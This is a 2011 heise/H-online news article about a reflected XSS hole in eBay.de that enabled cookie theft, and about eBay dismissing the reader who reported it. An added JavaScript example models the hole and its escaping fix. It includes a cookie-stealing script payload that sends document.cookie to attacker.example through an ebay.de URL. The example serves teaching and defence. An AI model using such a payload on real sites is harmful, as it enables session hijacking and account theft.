In association with heise online

10 August 2011, 12:05

Potential account theft with XSS hole in eBay.de


[Image: An XSS hole in eBay.de enables attackers to steal users' cookies. Source: heise Security]
A serious security hole in eBay.de enabled attackers to steal other users' cookies and take control of their accounts. It is not believed that this particular flaw affected any other national eBay sites.

On one of the online auctioneer's subpages, a URL parameter was insufficiently checked before being echoed back as part of the web page, making the page vulnerable to reflected cross-site scripting (XSS). Attackers could craft links to eBay.de which, when opened, executed arbitrary JavaScript code within the context of eBay's German domain.

This allowed potential attackers to read cookies and transmit them to a third party server. The hole was discovered by heise Security reader Daniel Sparka. The H's associates at heise Security were told that when Sparka notified eBay of the hole using the site's contact form, the company merely sent a standard reply advising him to delete the temporary files in his browser. The eBay support person apparently thought that the reported hole was an access problem caused by the customer's system. Sparka then contacted heise Security.
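The two paragraphs above describe a classic reflected XSS: a URL parameter written into the page unescaped, and a payload that reads document.cookie and ships it to a third-party host. The following is an added example written for this page, not code from eBay or from the article, that models the hole next to its fix. The path /search, the parameter name q and the host attacker.example are constructed placeholders; the article does not name the affected page.

```javascript
// Added example: a minimal model of a reflected XSS hole and its fix.
// The endpoint (/search), parameter (q) and attacker host are assumed,
// not taken from the article.

// Vulnerable: the "q" URL parameter is copied into the HTML unescaped,
// so a "<script>" in the parameter becomes a live script element.
function renderVulnerable(url) {
  const q = new URL(url).searchParams.get("q") || "";
  return `<html><body><h1>Search results for: ${q}</h1></body></html>`;
}

// Fix: escape every character that can change HTML structure before
// the parameter is written into element content.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(url) {
  const q = new URL(url).searchParams.get("q") || "";
  return `<html><body><h1>Search results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Constructed attacker link of the kind described: the payload reads the
// victim's cookies and sends them to a third-party server.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const ATTACK_URL = "https://www.ebay.de/search?q=" + encodeURIComponent(PAYLOAD);

// Crude tester's check: does the response contain a live <script> tag
// that was not in the page template?
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

// Runs the payload through both versions of the page.
function demo() {
  return {
    vulnerable: containsLiveScript(renderVulnerable(ATTACK_URL)),
    hardened: containsLiveScript(renderHardened(ATTACK_URL)),
  };
}

console.log(demo());
```

Escaping on output is the actual fix for the hole; marking session cookies HttpOnly would have blunted this particular payload, since document.cookie cannot read them, but it would not have stopped injected script from acting on the user's behalf inside the eBay.de session.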

Talking to heise Security, eBay confirmed the problem and took the affected page offline within 24 hours of the call. The press spokeswoman also confirmed that the general contact form is the only way for customers to report critical security holes, which is exactly what the heise Security reader tried to do, without success. There is no direct contact for security-related issues. The US eBay site has a vulnerability reporting page; however, it appears that this only exists in the US, with no equivalent in the UK or on other national eBay sites. One can only hope that whoever, outside the US, discovers the next critical hole won't be fobbed off with general browser tips.

(djwm)

Permalink: http://h-online.com/-1320908